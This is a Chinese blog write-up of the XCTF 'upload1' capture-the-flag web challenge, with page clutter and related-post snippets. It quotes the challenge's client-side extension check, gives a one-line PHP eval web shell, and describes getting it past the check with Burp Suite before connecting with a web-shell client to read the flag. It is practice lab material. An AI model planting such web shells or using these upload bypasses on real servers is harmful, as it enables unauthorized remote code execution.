攻防世界 web题——upload1

最新推荐文章于 2022-10-06 08:27:08 发布
最新推荐文章于 2022-10-06 08:27:08 发布
阅读量459 收藏 3
点赞数 2
文章标签: web
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/yqdid/article/details/105188236
版权

打开看到要我们上传文件:
在这里插入图片描述文件上传的漏洞。
查看源码,可以看到一段js代码:
在这里插入图片描述

Array.prototype.contains = function (obj) {  
    var i = this.length;  
    while (i--) {  
        if (this[i] === obj) {  
            return true;  
        }  
    }  
    return false;  
}  

function check(){
upfile = document.getElementById("upfile");
submit = document.getElementById("submit");
name = upfile.value;
ext = name.replace(/^.+\./,'');

if(['jpg','png'].contains(ext)){
	submit.disabled = false;
}else{
	submit.disabled = true;

	alert('请选择一张图片文件上传!');
}


}

可以看到这里只是对文件名后缀进行了判断,存在上传漏洞。
选择上传一句话木马
<?php @eval($_POST['aaa']);?>
和之前刷的靶场upload-labs 的第一关类似,绕过js代码只需要先修改上传文件的后缀名为允许的.jpg 或.png,用burpsuite抓包后就改后缀名为 .php 再上传。

或者是上传图片马。

我先试了试上传图片马
在这里插入图片描述
上传成功了
访问也没有异常
在这里插入图片描述然后尝试用菜刀连接获取shell

就在我以为我成功了的时候。。。
在这里插入图片描述我发现这个flag.txt 打不开。。。?
在这里插入图片描述感觉我获取了个假的shell…

然后我又尝试了第一种方法,用burpsuite改包
在这里插入图片描述上传成功

然后试试连接菜刀获取shell

这次我发现 获取的shell和上次的不一样了
在这里插入图片描述这次找对了,发现flag在flag.php中
在这里插入图片描述

yqdidy
关注
  • 2
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
[CTF刷篇]攻防世界Web进阶之upload1 Writeup
qq_43668710的博客
04-22 870
前言 这是一道文件上传,常见的考点有: 1.客户端过滤绕过 //禁用JS 2.文件扩展名绕过 3.黑名单绕过 4.白名单绕过 5.内容类型绕过 6.内容长度绕过 分析 回到这道,一般先查看源码,看看是不是客户端验证: 很不幸,还真就是客户端验证,直接禁用JavaScript: 应该可以成功绕过了,先写个php的webshell: 果然还是得刷,对比我刚开始接触CTF的时候的那股不知所...
攻防世界 upload1 解思路
xj28555的博客
07-13 1156
进入目 看到文件上传,那么肯定第一想法就是想的传一个木马上去。写好保存 提示说要提交图片文件,因为以弹窗的形式且反应速度较快,那么我猜测它是前端检测文件,所以我们可以先用bp绕过试一试,不行我们在用骚姿势。首先先把我们的1.php文件改成1.png,然后上传用bp拦截。 把后缀名改回php然后把包放出去。 发现上传成功,接下来就是用菜刀或者蚁剑连接我们的木马了。 在html目录里面发现flag ...
攻防世界web--【upload1】
weixin_53146913的博客
04-18 2962
对于上传文件的识别验证分为,前端和后端。 本是标准的前端验证,所以我们可以通过bp抓包来实现php文件上传,也可以通过只修改前端的js代码进行欺骗。 虽然二者都很简单,但是第一次做前端验证的还是想记录一下。 Let's go! 首先上传一个一句马。 之后找到这个上传控制属性:是这个"disabled" 咱们就是直接给他删掉的一个大动作, 我们发现这个alert弹窗消失了,然后我们的上传按键又复活了!! 我们就点击“上传”。 然后我们访问这个文件的网址。 ..
攻防世界 web upload1
YUK_103的博客
01-05 1955
型 : 文件上传 这个看目就应该能反应过来了 首先就给了一个上传界面,看一下源代码 下半段只是一个普通的文件上传脚本,但是这里面有个check()函数,说明和上面的js函数有点关系。就算你不会js(我也不会) 也应该能看懂:只能上传后缀名那俩个的文件。 其实这很简单:先写一个一句话木马,然后后缀名修改成jpg或png。用burpsuite修改一下上传到它的服务器上,再用菜刀连接就行了 这...
攻防世界各类目相关
weixin_43497617的博客
01-11 930
攻防世界 WEB WEB相关知识 PHP函数漏洞集合 PHP函数漏洞集合https://blog.csdn.net/qq_35078631/article/details/75200157 13个PHP魔术函数https://blog.csdn.net/mnmnwq/article/details/82462108 PHP魔法方法/函数详解https://blog.csdn.net/inqihoo/article/details/9235103?utm_medium=distribute.pc_releva
攻防世界Wire1杂项
11-20
攻防世界Wire1杂项,misc。 此详细解博客:https://danbaku.blog.csdn.net/article/details/127951997
中国首届医院网络安全攻防演练Web部分真
07-13
中国首届医院网络安全攻防演练Web部分真,厦门站。一个WEB站点 源码。
攻防世界杂项津门杯2021-m1
11-14
攻防世界杂项津门杯2021-m1,misc。 此详细解博客:https://blog.csdn.net/m0_59188912/article/details/127840757
攻防世界pacp1杂项
11-15
攻防世界pacp1杂项,misc。 此详细解博客:https://blog.csdn.net/m0_59188912/article/details/127862299
攻防世界杂项流量分析1
11-14
攻防世界杂项流量分析1,misc。 此详细解博客:https://blog.csdn.net/m0_59188912/article/details/127840807
[CTF]攻防世界Simple-check-100解(GDB)
网络安全知识分享
02-03 6683
关于GDB的简单使用 目链接:simple-check-100 GDB安装教程(以及peda插件)我的另一篇文章 注:本博文记录压缩包中ELF文件flag的获取过程,exe文件flag是乱码,具体过程就不给大家演示了。着重分享GDB的内容。 GDB的实现原理:其他师傅的文章,很详细 step 1 获取信息 我们拿到了目,老样子获取信息。 step 2 放入IDA分析一下 int __cdecl main(int argc, const char **argv, const char **envp) {
攻防世界目robots
qq_44301170的博客
09-28 459
攻防世界robots 目链接:链接. 点击获取场景后,发现打开的是一个空白网页,查看下源代码 因为目是关于robots的,用御剑扫描一下目录 发现了robots.txt打开 把f1ag_1s_h3re.php添加到原网址后面 得到了flag。 ...
file upload 攻防世界_Xctf攻防世界Web进阶攻略
weixin_42510835的博客
12-30 228
玩法介绍攻防世界模块是一款提升个人信息安全水平的益智趣味答,用户可任意选择目类型进行答。第一:Burp拦截后对id进行爆破。-----------------------------------------------------------------------------第二:Burp拦截后对search参数进行sql注入。...
攻防世界目练习(3)
rreally的博客
08-10 185
sherlock 一打开就是好长一串的文章,感觉肯定有问,往下翻的时候看见有一小段是大小写相间的,于是推测可能是培根密码,最后将正篇顺下来就是: ZEROONEZEROZEROZEROZEROONEZEROZEROONEZEROZEROONEZEROZEROONEZEROONEZEROONEZEROONEZEROZEROZEROONEZEROONEZEROZEROONEONEZEROONEZEROZEROZEROZEROONEONEZEROONEZEROONEZEROONEZEROZEROZEROONEZ
攻防世界 web webshell 【文件上传类型】
Hrain7的博客
11-11 939
写一个php文件,写入一句话木马 <?php @eval($_POST['shell']);?> 用蚁剑上传连接 连接打开发现flag.txt 打开flag.txt即可得到flag
攻防世界web目记录(二)
wanan的博客
10-06 1234
攻防世界web目记录
攻防世界(高手进阶区)——upload1
知足且坚定,温柔且上进
02-12 1346
前提: 打开页面,知道此是关于文件上传漏洞的,打开源代码,提示只能上传jpg结尾的图片,于是我通过UltraEdit将一句话木马编辑到一张图片,进行文件上传,虽然页面提示上传成功,但是我用蚁剑连接总是不成功,于是有了后面的操作。。。。。。 经过思索,我发现以上操作在此没有必要,(其实上面操作可以利用简单的挂黑页操作) 我新建了一个含一句话木马的且后缀为jpg的文档,进行上传,进行抓包: 将...
攻防世界 WEB 新手练习区 答(1-12解)
小哈里的博客
10-23 9000
序 传送门:https://adworld.xctf.org.cn/task/ 1、
攻防世界 web高手进阶区 8分 upload
闵行小鱼塘
08-28 469
继续ctf的旅程,开始攻防世界web高手进阶区的8分,本文是upload的writeup
攻防世界upload1
最新发布
07-28
- *2* *3* [XCTF-攻防世界CTF平台-Web类——11、upload1(文件上传、前端校验)](https://blog.csdn.net/Onlyone_1314/article/details/121503130)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值